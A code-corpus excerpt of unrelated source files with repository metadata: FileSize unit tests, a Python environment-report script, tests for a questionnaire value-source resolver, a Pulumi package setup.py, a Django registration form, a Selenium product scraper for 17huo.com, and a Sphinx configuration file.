673354e3055a7b1d71b08746c1c94df14e4db352 | 4,429 | py | Python | TestFileSize1000_3.py | ytyaru/Python.FileSize.201702071138 | 569c45d5e9b91befbaece50520eb69955e148c65 | [
"CC0-1.0"
] | null | null | null | TestFileSize1000_3.py | ytyaru/Python.FileSize.201702071138 | 569c45d5e9b91befbaece50520eb69955e148c65 | [
"CC0-1.0"
] | 6 | 2017-02-09T00:54:50.000Z | 2017-02-09T10:56:13.000Z | TestFileSize1000_3.py | ytyaru/Python.FileSize.201702071138 | 569c45d5e9b91befbaece50520eb69955e148c65 | [
"CC0-1.0"
] | null | null | null | import unittest
import FileSize
from decimal import Decimal
class TestFileSize1000_3(unittest.TestCase):
def test_999(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = 999
self.assertEqual(self.__target.Get(actual), "999 B")
def test_1000(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = 1000
self.assertEqual(self.__target.Get(actual), "1 KB")
def test_1023(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = 1023
self.assertEqual(self.__target.Get(actual), "1.02 KB")
def test_1024(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = 1024
self.assertEqual(self.__target.Get(actual), "1.02 KB")
def test_1000KB_1(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = 1000 * 1000 - 1
self.assertEqual(self.__target.Get(actual), "999.99 KB")
def test_1MB(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = 1000 * 1000
self.assertEqual(self.__target.Get(actual), "1 MB")
def test_1000MB_1(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = ((1000 ** 2) * 1000) - 1
self.assertEqual(self.__target.Get(actual), "999.99 MB")
def test_1GB(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = ((1000 ** 2) * 1000)
self.assertEqual(self.__target.Get(actual), "1 GB")
def test_1000GB_1(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = ((1000 ** 3) * 1000) - 1
self.assertEqual(self.__target.Get(actual), "999.99 GB")
def test_1TB(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = ((1000 ** 3) * 1000)
self.assertEqual(self.__target.Get(actual), "1 TB")
def test_1000TB_1(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = ((1000 ** 4) * 1000) - 1
self.assertEqual(self.__target.Get(actual), "999.99 TB")
def test_1PB(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = ((1000 ** 4) * 1000)
self.assertEqual(self.__target.Get(actual), "1 PB")
def test_1000PB_1(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = Decimal((1000 ** 5) * 1000) - 1
self.assertEqual(self.__target.Get(actual), "999.99 PB")
def test_1EB(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = Decimal((1000 ** 5) * 1000)
self.assertEqual(self.__target.Get(actual), "1 EB")
def test_1000EB_1(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = Decimal((1000 ** 6) * 1000) - 1
self.assertEqual(self.__target.Get(actual), "999.99 EB")
def test_1ZB(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = Decimal((1000 ** 6) * 1000)
self.assertEqual(self.__target.Get(actual), "1 ZB")
def test_1000ZB_1(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = Decimal((1000 ** 7) * 1000) - 1
self.assertEqual(self.__target.Get(actual), "999.99 ZB")
def test_1YB(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = Decimal((1000 ** 7) * 1000)
self.assertEqual(self.__target.Get(actual), "1 YB")
def test_1000YB_1(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = Decimal((1000 ** 8) * 1000) - 1
self.assertEqual(self.__target.Get(actual), "999.99 YB")
def test_1YB(self):
self.__target = FileSize.FileSize(byte_size_of_unit=1000, integral_figure_num=3)
actual = Decimal((1000 ** 7) * 1000)
self.assertEqual(self.__target.Get(actual), "1 YB")
| 47.117021 | 88 | 0.671032 |
cd9a73d95108ad89864474bf0fd85766c9edfd0d | 696 | py | Python | scripts/show_environment.py | lmenou/py-pde | 3899cba0481657ea7b3d5c05e318d0b851bbe8cd | [
"MIT"
] | 163 | 2020-03-30T09:26:32.000Z | 2022-03-31T12:22:18.000Z | scripts/show_environment.py | lmenou/py-pde | 3899cba0481657ea7b3d5c05e318d0b851bbe8cd | [
"MIT"
] | 127 | 2020-03-31T15:33:15.000Z | 2022-03-30T19:27:47.000Z | scripts/show_environment.py | lmenou/py-pde | 3899cba0481657ea7b3d5c05e318d0b851bbe8cd | [
"MIT"
] | 37 | 2020-03-10T18:54:22.000Z | 2022-03-29T14:45:40.000Z | #!/usr/bin/env python3
"""
This script shows important information about the current python environment and the
associated installed packages. This information can be helpful in understanding issues
that occur with the package
"""
import sys
from pathlib import Path
PACKAGE_PATH = Path(__file__).resolve().parents[1]
sys.path.append(str(PACKAGE_PATH))
from pde import environment
env = environment()
for category, data in env.items():
if hasattr(data, "items"):
print(f"\n{category}:")
for key, value in data.items():
print(f" {key}: {value}")
else:
data_formatted = data.replace("\n", "\n ")
print(f"{category}: {data_formatted}")
| 26.769231 | 86 | 0.682471 |
442ff9956300f476d06723650adf00e18c5aaad8 | 14,636 | py | Python | tests/app/questionnaire/test_value_source_resolver.py | pricem14pc/eq-questionnaire-runner | 54cc2947ba181a2673ea1fb7cf6b4acdd609e06b | [
"MIT"
] | null | null | null | tests/app/questionnaire/test_value_source_resolver.py | pricem14pc/eq-questionnaire-runner | 54cc2947ba181a2673ea1fb7cf6b4acdd609e06b | [
"MIT"
] | null | null | null | tests/app/questionnaire/test_value_source_resolver.py | pricem14pc/eq-questionnaire-runner | 54cc2947ba181a2673ea1fb7cf6b4acdd609e06b | [
"MIT"
] | null | null | null | from typing import Mapping, Optional, Union
from unittest.mock import Mock
import pytest
from app.data_models import AnswerStore, ListStore
from app.data_models.answer import Answer
from app.questionnaire import Location, QuestionnaireSchema
from app.questionnaire.location import InvalidLocationException
from app.questionnaire.relationship_location import RelationshipLocation
from app.questionnaire.value_source_resolver import ValueSourceResolver
from tests.app.data_model.test_answer import ESCAPED_CONTENT, HTML_CONTENT
def get_list_items(num: int):
    """Build sequential list-item identifiers: ["item-1", ..., "item-<num>"]."""
    return ["item-" + str(index) for index in range(1, num + 1)]
def get_mock_schema():
    """Return a Mock spec'd on a minimal linear QuestionnaireSchema."""
    minimal_schema_json = {
        "questionnaire_flow": {
            "type": "Linear",
            "options": {"summary": {"collapsible": False}},
        }
    }
    return Mock(QuestionnaireSchema(minimal_schema_json))
def get_value_source_resolver(
    schema: Optional[QuestionnaireSchema] = None,
    answer_store: Optional[AnswerStore] = None,
    list_store: Optional[ListStore] = None,
    metadata: Optional[dict] = None,
    response_metadata: Optional[Mapping] = None,
    location: Union[Location, RelationshipLocation] = Location(
        section_id="test-section", block_id="test-block"
    ),
    list_item_id: Optional[str] = None,
    routing_path_block_ids: Optional[list] = None,
    use_default_answer: bool = False,
    escape_answer_values: bool = False,
):
    """Build a ValueSourceResolver wired up with test-friendly defaults.

    When ``schema``/``answer_store``/``list_store`` are left as None, a mock
    schema and fresh empty stores are created, so state never leaks between
    calls. ``is_repeating_answer`` is always re-mocked from ``list_item_id``
    (overriding any value pre-set on a passed-in schema), and
    ``get_default_answer`` is mocked to return None unless
    ``use_default_answer`` is set.
    """
    # None sentinels instead of mutable defaults: `answer_store=AnswerStore()`
    # in the signature would be evaluated once at definition time and shared
    # by every call to this helper.
    if answer_store is None:
        answer_store = AnswerStore()
    if list_store is None:
        list_store = ListStore()
    if not schema:
        schema = get_mock_schema()
    # The schema's repeating flag is derived from whether a list_item_id was
    # supplied; this assignment replaces any pre-mocked value.
    schema.is_repeating_answer = Mock(return_value=bool(list_item_id))
    if not use_default_answer:
        schema.get_default_answer = Mock(return_value=None)

    return ValueSourceResolver(
        answer_store=answer_store,
        list_store=list_store,
        metadata=metadata,
        response_metadata=response_metadata,
        schema=schema,
        location=location,
        list_item_id=list_item_id,
        routing_path_block_ids=routing_path_block_ids,
        use_default_answer=use_default_answer,
        escape_answer_values=escape_answer_values,
    )
def test_answer_source():
    """A plain answers value source resolves to the stored answer value."""
    resolver = get_value_source_resolver(
        answer_store=AnswerStore([{"answer_id": "some-answer", "value": "Yes"}])
    )
    resolved = resolver.resolve({"source": "answers", "identifier": "some-answer"})
    assert resolved == "Yes"
def test_answer_source_with_dict_answer_selector():
    """A "selector" key picks a single entry out of a dict-valued answer."""
    stored_answers = [
        {"answer_id": "some-answer", "value": {"years": 1, "months": 10}}
    ]
    resolver = get_value_source_resolver(answer_store=AnswerStore(stored_answers))
    value_source = {
        "source": "answers",
        "identifier": "some-answer",
        "selector": "years",
    }
    assert resolver.resolve(value_source) == 1
def test_answer_source_with_list_item_id_no_list_item_selector():
    """Without a list_item_selector, the resolver's own list_item_id is used."""
    stored_answers = [
        {"answer_id": "some-answer", "list_item_id": "item-1", "value": "Yes"}
    ]
    resolver = get_value_source_resolver(
        answer_store=AnswerStore(stored_answers),
        list_item_id="item-1",
    )
    resolved = resolver.resolve({"source": "answers", "identifier": "some-answer"})
    assert resolved == "Yes"
def test_list_item_id_ignored_if_answer_not_in_list_collector_or_repeat():
    """A non-repeating answer resolves even when a list_item_id is supplied."""
    schema = get_mock_schema()
    # NOTE(review): get_value_source_resolver re-mocks is_repeating_answer
    # from bool(list_item_id), so this False stub is overwritten before the
    # resolver is built — confirm the stub below is still needed.
    schema.is_repeating_answer = Mock(return_value=False)

    resolver = get_value_source_resolver(
        schema=schema,
        answer_store=AnswerStore([{"answer_id": "some-answer", "value": "Yes"}]),
        list_item_id="item-1",
    )
    resolved = resolver.resolve({"source": "answers", "identifier": "some-answer"})
    assert resolved == "Yes"
def test_answer_source_with_list_item_selector_location():
    """A "location" list_item_selector reads the list item id off the current location."""
    stored_answers = [
        {"answer_id": "some-answer", "list_item_id": "item-1", "value": "Yes"}
    ]
    current_location = Location(
        section_id="some-section", block_id="some-block", list_item_id="item-1"
    )
    resolver = get_value_source_resolver(
        answer_store=AnswerStore(stored_answers),
        location=current_location,
    )
    value_source = {
        "source": "answers",
        "identifier": "some-answer",
        "list_item_selector": {
            "source": "location",
            "identifier": "list_item_id",
        },
    }
    assert resolver.resolve(value_source) == "Yes"
def test_answer_source_with_list_item_selector_location_none():
    """Resolving a location-based list_item_selector raises when location is None."""
    value_source_resolver = get_value_source_resolver(
        answer_store=AnswerStore(
            [
                {
                    "answer_id": "some-answer",
                    "list_item_id": "item-1",
                    "value": "Yes",
                }
            ]
        ),
        location=None,
    )

    with pytest.raises(InvalidLocationException):
        value_source_resolver.resolve(
            {
                "source": "answers",
                "identifier": "some-answer",
                # "identifier" (not "id") matches the selector shape used by
                # every other list_item_selector test in this module; the
                # exception fires on the missing location either way.
                "list_item_selector": {
                    "source": "location",
                    "identifier": "list_item_id",
                },
            }
        )
def test_answer_source_with_list_item_selector_list_first_item():
    """A "list" selector with "first" resolves against the list's first item."""
    stored_answers = [
        {"answer_id": "some-answer", "list_item_id": "item-1", "value": "Yes"}
    ]
    resolver = get_value_source_resolver(
        answer_store=AnswerStore(stored_answers),
        list_store=ListStore([{"name": "some-list", "items": get_list_items(3)}]),
    )
    value_source = {
        "source": "answers",
        "identifier": "some-answer",
        "list_item_selector": {
            "source": "list",
            "identifier": "some-list",
            "selector": "first",
        },
    }
    assert resolver.resolve(value_source) == "Yes"
def test_answer_source_outside_of_repeating_section():
    """A non-repeating answer resolves from within a repeating location."""
    schema = get_mock_schema()
    schema.is_repeating_answer = Mock(return_value=False)

    repeating_location = Location(
        section_id="some-section", block_id="some-block", list_item_id="item-1"
    )
    resolver = get_value_source_resolver(
        schema=schema,
        answer_store=AnswerStore([{"answer_id": "some-answer", "value": "Yes"}]),
        list_store=ListStore([{"name": "some-list", "items": get_list_items(3)}]),
        location=repeating_location,
    )
    resolved = resolver.resolve({"source": "answers", "identifier": "some-answer"})
    assert resolved == "Yes"
@pytest.mark.parametrize("is_answer_on_path", [True, False])
def test_answer_source_not_on_path_non_repeating_section(is_answer_on_path):
    """An answer resolves only when its block is in routing_path_block_ids."""
    schema = get_mock_schema()
    location = Location(section_id="test-section", block_id="test-block")
    if is_answer_on_path:
        # Schema maps the answer to a block that IS on the routing path below.
        schema.get_block_for_answer_id = Mock(return_value={"id": "block-on-path"})
        answer_id = "answer-on-path"
        expected_result = "Yes"
    else:
        # Block id is absent from routing_path_block_ids, so the stored answer
        # is treated as off-path and resolution should yield None.
        schema.get_block_for_answer_id = Mock(return_value={"id": "block-not-on-path"})
        answer_id = "answer-not-on-path"
        expected_result = None
    answer = Answer(answer_id=answer_id, value="Yes")
    value_source_resolver = get_value_source_resolver(
        schema=schema,
        answer_store=AnswerStore([answer.to_dict()]),
        list_store=ListStore([{"name": "some-list", "items": get_list_items(3)}]),
        location=location,
        list_item_id=location.list_item_id,
        routing_path_block_ids=["block-on-path"],
    )
    # NOTE(review): the resolved identifier is hard-coded to "answer-on-path"
    # in both branches; in the off-path branch the stored answer id differs,
    # so the None result would also follow from the id mismatch — confirm the
    # off-path branch exercises the path check rather than a missing answer.
    assert (
        value_source_resolver.resolve(
            {"source": "answers", "identifier": "answer-on-path"}
        )
        == expected_result
    )
@pytest.mark.parametrize("is_answer_on_path", [True, False])
def test_answer_source_not_on_path_repeating_section(is_answer_on_path):
    """A repeating answer resolves only when its block is on the routing path."""
    schema = get_mock_schema()
    # NOTE(review): get_value_source_resolver re-mocks is_repeating_answer
    # from bool(list_item_id) (True here, since list_item_id="item-1"), so
    # this stub is redundant but harmless — confirm intent.
    schema.is_repeating_answer = Mock(return_value=True)
    location = Location(
        section_id="test-section", block_id="test-block", list_item_id="item-1"
    )
    if is_answer_on_path:
        # Schema maps the answer to a block that IS on the routing path below.
        schema.get_block_for_answer_id = Mock(return_value={"id": "block-on-path"})
        answer_id = "answer-on-path"
        expected_result = "Yes"
    else:
        # Block id is absent from routing_path_block_ids, so the stored answer
        # is treated as off-path and resolution should yield None.
        schema.get_block_for_answer_id = Mock(return_value={"id": "block-not-on-path"})
        answer_id = "answer-not-on-path"
        expected_result = None
    answer = Answer(answer_id=answer_id, list_item_id="item-1", value="Yes")
    value_source_resolver = get_value_source_resolver(
        schema=schema,
        answer_store=AnswerStore([answer.to_dict()]),
        list_store=ListStore([{"name": "some-list", "items": get_list_items(3)}]),
        location=location,
        list_item_id=location.list_item_id,
        routing_path_block_ids=["block-on-path"],
    )
    # NOTE(review): identifier is hard-coded to "answer-on-path" in both
    # branches (stored id differs in the off-path branch) — same caveat as
    # the non-repeating variant of this test.
    assert (
        value_source_resolver.resolve(
            {"source": "answers", "identifier": "answer-on-path"}
        )
        == expected_result
    )
@pytest.mark.parametrize("use_default_answer", [True, False])
def test_answer_source_default_answer(use_default_answer):
    """The schema default answer is used only when defaults are enabled."""
    schema = get_mock_schema()
    default = (
        Answer(answer_id="some-answer", value="Yes") if use_default_answer else None
    )
    schema.get_default_answer = Mock(return_value=default)
    resolver = get_value_source_resolver(
        schema=schema,
        use_default_answer=use_default_answer,
    )
    source = {"source": "answers", "identifier": "some-answer"}
    assert resolver.resolve(source) == ("Yes" if use_default_answer else None)
@pytest.mark.parametrize(
    "metadata_identifier, expected_result",
    [("region_code", "GB-ENG"), ("language_code", None)],
)
def test_metadata_source(metadata_identifier, expected_result):
    """Known metadata keys resolve to their value; unknown keys to None."""
    resolver = get_value_source_resolver(metadata={"region_code": "GB-ENG"})
    source = {"source": "metadata", "identifier": metadata_identifier}
    assert resolver.resolve(source) == expected_result
@pytest.mark.parametrize(
    "list_count",
    [0, 1, 5, 10],
)
def test_list_source(list_count):
    """The "count" selector resolves to the number of items in the list."""
    resolver = get_value_source_resolver(
        list_store=ListStore(
            [{"name": "some-list", "items": get_list_items(list_count)}]
        ),
    )
    source = {"source": "list", "identifier": "some-list", "selector": "count"}
    assert resolver.resolve(source) == list_count


def test_list_source_with_id_selector_first():
    """The "first" selector resolves to the id of the first list item."""
    resolver = get_value_source_resolver(
        list_store=ListStore([{"name": "some-list", "items": get_list_items(3)}]),
    )
    source = {"source": "list", "identifier": "some-list", "selector": "first"}
    assert resolver.resolve(source) == "item-1"


def test_list_source_with_id_selector_same_name_items():
    """The "same_name_items" selector resolves to that sub-list of item ids."""
    list_model = {
        "name": "some-list",
        "items": get_list_items(5),
        "same_name_items": get_list_items(3),
    }
    resolver = get_value_source_resolver(list_store=ListStore([list_model]))
    source = {
        "source": "list",
        "identifier": "some-list",
        "selector": "same_name_items",
    }
    assert resolver.resolve(source) == get_list_items(3)


@pytest.mark.parametrize(
    "primary_person_list_item_id",
    ["item-1", "item-2"],
)
def test_list_source_id_selector_primary_person(primary_person_list_item_id):
    """The "primary_person" selector resolves to the primary person's item id."""
    list_model = {
        "name": "some-list",
        "primary_person": primary_person_list_item_id,
        "items": get_list_items(3),
    }
    resolver = get_value_source_resolver(list_store=ListStore([list_model]))
    source = {
        "source": "list",
        "identifier": "some-list",
        "selector": "primary_person",
    }
    assert resolver.resolve(source) == primary_person_list_item_id
def test_location_source():
    """The current location's list_item_id is resolvable as a value source."""
    resolver = get_value_source_resolver(list_item_id="item-1")
    source = {"source": "location", "identifier": "list_item_id"}
    assert resolver.resolve(source) == "item-1"


def test_response_metadata_source():
    """Response metadata values are resolvable by identifier."""
    started_at = "2021-10-11T09:40:11.220038+00:00"
    resolver = get_value_source_resolver(
        response_metadata={"started_at": started_at}
    )
    source = {"source": "response_metadata", "identifier": "started_at"}
    assert resolver.resolve(source) == started_at
@pytest.mark.parametrize(
    "answer_value, escaped_value",
    [
        (HTML_CONTENT, ESCAPED_CONTENT),
        ([HTML_CONTENT, "some value"], [ESCAPED_CONTENT, "some value"]),
        (1, 1),
        (None, None),
    ],
)
def test_answer_value_can_be_escaped(answer_value, escaped_value):
    """String answers (and lists of them) are HTML-escaped when enabled."""
    store = AnswerStore([{"answer_id": "some-answer", "value": answer_value}])
    resolver = get_value_source_resolver(
        answer_store=store,
        escape_answer_values=True,
    )
    source = {"source": "answers", "identifier": "some-answer"}
    assert resolver.resolve(source) == escaped_value


def test_answer_value_with_selector_can_be_escaped():
    """A value picked out of a dict answer via "selector" is HTML-escaped."""
    store = AnswerStore(
        [{"answer_id": "some-answer", "value": {"key_1": HTML_CONTENT, "key_2": 1}}]
    )
    resolver = get_value_source_resolver(
        answer_store=store,
        escape_answer_values=True,
    )
    source = {"source": "answers", "identifier": "some-answer", "selector": "key_1"}
    assert resolver.resolve(source) == ESCAPED_CONTENT
| 28.811024 | 87 | 0.585747 |
2b56986071cac09222bf3493b4e6582683cb2d44 | 1,762 | py | Python | pkg/codegen/testing/test/testdata/plain-and-default/python/setup.py | goverdhan07/pulumi | 301efa60653c90047a3427af41339387223dbccd | [
"Apache-2.0"
] | 12,004 | 2018-06-17T23:56:29.000Z | 2022-03-31T18:00:09.000Z | pkg/codegen/testing/test/testdata/plain-and-default/python/setup.py | goverdhan07/pulumi | 301efa60653c90047a3427af41339387223dbccd | [
"Apache-2.0"
] | 6,263 | 2018-06-17T23:27:24.000Z | 2022-03-31T19:20:35.000Z | pkg/codegen/testing/test/testdata/plain-and-default/python/setup.py | goverdhan07/pulumi | 301efa60653c90047a3427af41339387223dbccd | [
"Apache-2.0"
] | 706 | 2018-06-17T23:56:50.000Z | 2022-03-31T11:20:23.000Z | # coding=utf-8
# *** WARNING: this file was generated by test. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import errno
from setuptools import setup, find_packages
from setuptools.command.install import install
from subprocess import check_call
VERSION = "0.0.0"
PLUGIN_VERSION = "0.0.0"
class InstallPluginCommand(install):
    """``install`` command that also installs the Pulumi resource plugin."""

    def run(self):
        # Perform the normal package install first.
        install.run(self)
        try:
            # Fetch the provider plugin matching this SDK's pinned version.
            check_call(['pulumi', 'plugin', 'install', 'resource', 'foobar', PLUGIN_VERSION])
        except OSError as error:
            # ENOENT: the `pulumi` CLI binary itself is not on PATH.
            if error.errno == errno.ENOENT:
                print(f"""
                There was an error installing the foobar resource provider plugin.
                It looks like `pulumi` is not installed on your system.
                Please visit https://pulumi.com/ to install the Pulumi CLI.
                You may try manually installing the plugin by running
                `pulumi plugin install resource foobar {PLUGIN_VERSION}`
                """)
            else:
                # Any other OS-level failure is a real error; re-raise it.
                raise
def readme():
    """Return README.md as the long description, or a fallback if absent."""
    fallback = "foobar Pulumi Package - Development Version"
    try:
        readme_file = open('README.md', encoding='utf-8')
    except FileNotFoundError:
        return fallback
    with readme_file:
        return readme_file.read()
# Standard setuptools metadata for the generated SDK.  `cmdclass` swaps in
# InstallPluginCommand so a pip install also fetches the provider plugin.
setup(name='pulumi_foobar',
      version=VERSION,
      long_description=readme(),
      long_description_content_type='text/markdown',
      cmdclass={
          'install': InstallPluginCommand,
      },
      packages=find_packages(),
      package_data={
          'pulumi_foobar': [
              'py.typed',
              'pulumi-plugin.json',
          ]
      },
      install_requires=[
          'parver>=0.2.1',
          'pulumi',
          'semver>=2.8.1'
      ],
      zip_safe=False)
| 29.366667 | 93 | 0.585698 |
4c51c8366d9b541619f497b38b35d7548674254f | 58 | py | Python | edit/models/restorers/__init__.py | tpoisonooo/basicVSR_mge | 53df836a7dcc075083ef7c9ff7cabea69fec3192 | [
"Apache-2.0"
] | 28 | 2021-03-23T09:00:33.000Z | 2022-03-10T03:55:00.000Z | edit/models/restorers/__init__.py | tpoisonooo/basicVSR_mge | 53df836a7dcc075083ef7c9ff7cabea69fec3192 | [
"Apache-2.0"
] | 2 | 2021-04-17T20:08:55.000Z | 2022-02-01T17:48:55.000Z | edit/models/restorers/__init__.py | tpoisonooo/basicVSR_mge | 53df836a7dcc075083ef7c9ff7cabea69fec3192 | [
"Apache-2.0"
] | 5 | 2021-05-19T07:35:56.000Z | 2022-01-13T02:11:50.000Z | from .BidirectionalRestorer import BidirectionalRestorer
| 19.333333 | 56 | 0.896552 |
ca5630fc244f181929c18bf90d460051333ae183 | 392 | py | Python | main/forms.py | agilghif/temenin-isoman | 18a768363420709c3a03a7d1453ddd8fa138c8b5 | [
"Unlicense"
] | null | null | null | main/forms.py | agilghif/temenin-isoman | 18a768363420709c3a03a7d1453ddd8fa138c8b5 | [
"Unlicense"
] | null | null | null | main/forms.py | agilghif/temenin-isoman | 18a768363420709c3a03a7d1453ddd8fa138c8b5 | [
"Unlicense"
] | null | null | null | from django import *
from django.forms import ModelForm
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
from django.forms import ModelForm, Textarea, TextInput
from deteksi_mandiri.models import *
class CreateUserForm(UserCreationForm):
    """Registration form exposing username, email and both password fields."""

    class Meta:
        # Built on Django's stock User model; password1/password2 come from
        # UserCreationForm and provide the confirm-password validation.
        model = User
        fields = ['username', 'email', 'password1', 'password2']
| 30.153846 | 64 | 0.762755 |
b268ed3d7df9edf69a267fb5fb9a4374f4add36d | 1,420 | py | Python | 17huo.py | ZhongXinWang/python | 4cf3ecdc9d9e811e777c6d8408a8319097cfdec3 | [
"Apache-2.0"
] | null | null | null | 17huo.py | ZhongXinWang/python | 4cf3ecdc9d9e811e777c6d8408a8319097cfdec3 | [
"Apache-2.0"
] | null | null | null | 17huo.py | ZhongXinWang/python | 4cf3ecdc9d9e811e777c6d8408a8319097cfdec3 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#Author:Winston.Wang
# Scrape product names and prices from 17huo.com search results with Selenium,
# paging through the first three result pages in a headless Chrome browser.
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
import time
'''
打开网页 get()
find_element_by_css_selector() 根据选择器找元素
find_elements_by_tag_name() 根据标签的名字
execute_script() 执行脚本
set_page_load_timeout() #等待超时时间
'''
# Specify the location of the browser
'''
会启动浏览器
browers = webdriver.Chrome()
browers.set_page_load_timeout(30)
print(dir(browers))
'''
# Headless browser mode: no visible browser window is opened.
chrome_options = Options()
chrome_options.add_argument('--headless')
browers = webdriver.Chrome(chrome_options=chrome_options)
browers.set_page_load_timeout(30)  # fail the page load after 30 seconds
# Open the page (the URL query is the URL-encoded search keyword).
browers.get('http://www.17huo.com/newsearch/?k=%E5%86%85%E8%A3%A4')
# Fetch the data
# Click the pagination link to fetch the next page's data.
for i in range(3):
    print('--------------第%s页-------------' % (i+1))
    # Scroll to the bottom so lazily-loaded items get rendered.
    browers.execute_script('window.scrollTo(0, document.body.scrollHeight);')
    goods = browers.find_element_by_css_selector('#book_item_list').find_elements_by_css_selector('.book_item_list_box')
    for good in goods:
        name = good.find_element_by_css_selector('div.shop_box > div.book_item_mid.clearfix > a').text;
        price = good.find_element_by_css_selector('div.shop_box > div.book_item_mid.clearfix > div.book_item_price > span').text;
        print('商品名称:%s,商品价格:%s' % (name,price))
    nextPage = browers.find_element_by_css_selector('body > div.wrap > div.search_container > div.main_new > div.tcdPageCode.goldPage > a.nextPage');
    nextPage.click()
    time.sleep(5)  # give the next page time to load before scraping again
| 30.869565 | 146 | 0.754225 |
64afb0edf416b9ff1b8bc4aacefa53cb1cc02a37 | 9,555 | py | Python | doc/conf.py | sam-at-github/PySCIPOpt | 35775087653e6a920cb21683b7e2922141e8fb01 | [
"MIT"
] | 2 | 2019-04-25T12:56:06.000Z | 2019-04-25T12:56:10.000Z | PySCIPOpt/doc/conf.py | linjc16/TBranT | cc051e386775da87f25964f98547c29dde841362 | [
"MIT"
] | 3 | 2017-07-26T15:24:02.000Z | 2018-07-10T17:08:25.000Z | PySCIPOpt/doc/conf.py | linjc16/TBranT | cc051e386775da87f25964f98547c29dde841362 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# PySCIPOpt documentation build configuration file, created by
# sphinx-quickstart on Tue Dec 5 12:34:03 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
    'sphinx.ext.autodoc',      # pull documentation from docstrings
    'sphinx.ext.coverage',     # report undocumented objects
    'sphinx.ext.mathjax',      # render math via MathJax
    'sphinx.ext.viewcode',     # link to highlighted source code
    'sphinx.ext.githubpages',  # emit .nojekyll for GitHub Pages hosting
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'PySCIPOpt'
copyright = '2017, Matthias Miltenberger'
author = 'Matthias Miltenberger'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.2.0'
# The full version, including alpha/beta/rc tags.
release = '1.2.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'classic'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents.
# "<project> v<release> documentation" by default.
#html_title = 'PySCIPOpt v1.2.0'
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
